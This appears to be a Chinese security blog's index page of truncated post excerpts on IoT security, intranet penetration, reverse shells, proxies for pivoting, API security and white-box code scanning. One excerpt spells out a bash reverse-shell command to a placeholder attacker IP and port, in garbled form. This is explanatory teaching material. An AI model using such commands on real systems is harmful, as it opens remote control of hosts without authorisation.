2021-02-01 阅读(483)

随着互联网和智能设备(手机、平板电脑、智能家电、智能机器人和智能查询终端)的快速发展，传统企业信息化必然向物联网过渡。第一，会节省企业的建设和运营成本(比如部署WiFi/I...

2021-01-29 阅读(427)

“知己知被，百战不殆”。在内网渗透中，想要获取更多的攻击面，那么信息收集是 必不可少的，而且信息的完整性决定了攻防渗透的结果。在内网中的资产多、服务多，收 集的敏感...

2021-01-28 阅读(446)

使用Bash命令反弹Shell的Shell也称为终端或壳，是人与内核之间的翻译官，而Bash则是Linux中默认使用Bash反弹Shell的命令如下： bash-i/dev/tcp/攻击机ip/攻击机端口0l bash-i/dev/tcp/攻击机ip/攻击机...

2021-01-27 阅读(642)

反弹Shell是指渗透测试中监听某个端口，然后通过目标连接攻击机监听的端口，在攻击机反弹得到目标机的Shell。通常在目标网络有防火墙或其他因素限制，导致无法持续控制目标，成执...

2021-01-27 阅读(246)

Http代理和Socks代理。Http代理使用Http协议，工作在应用层，主要用于代理浏览器访问网页。Socks代理使用Socks协议，工作在会话层，主要用于传输数据包。Socks代理分为Socks4和Socks5，Sock...

2021-01-27 阅读(298)

内网渗透代理尤为重要。攻击者通过边界主机进入内网，经常将其作为横向渗透的跳板。但是，目前的内部网络大多部署了很多安全设备，网络结构复杂，对一些系统的访问会受到各种...

2021-01-23 阅读(816)

APP程序接口(API)由一组定义和协议组成，可以用来构建和企业集成应用软件。伴随着数字转型的深入，API产品越来越有价值，尤其是与微服务、DevOps等技术的融合，使API变成公司战略加...

2021-01-19 阅读(374)

本次项目是公司的大客户，客户和公司领导也重视渗透测试结果，有本次安全测试经验。因为已经是生产环境的系统，而且以前也进行过渗透测试，所以最初的报告中发现的漏洞基本上...

2021-01-18 阅读(217)

在白盒检测方面，我们主要基于两个自主开发的白盒引擎进行检测，一个是基于代码属性图(cpg)，内部称为阿波罗，另一个是基于字节码点，内部称为冥王哈迪斯。关于冥王哈迪斯，试...

2021-01-18 阅读(276)

我们内部在用的自研白盒系统(apollo)拓扑图，目前第三方方面支持三种方法接入分布式白盒 系统。第一种方法是直接登陆web平台进行日常任务提交操作，第二种是通过marthakinspiplines方法...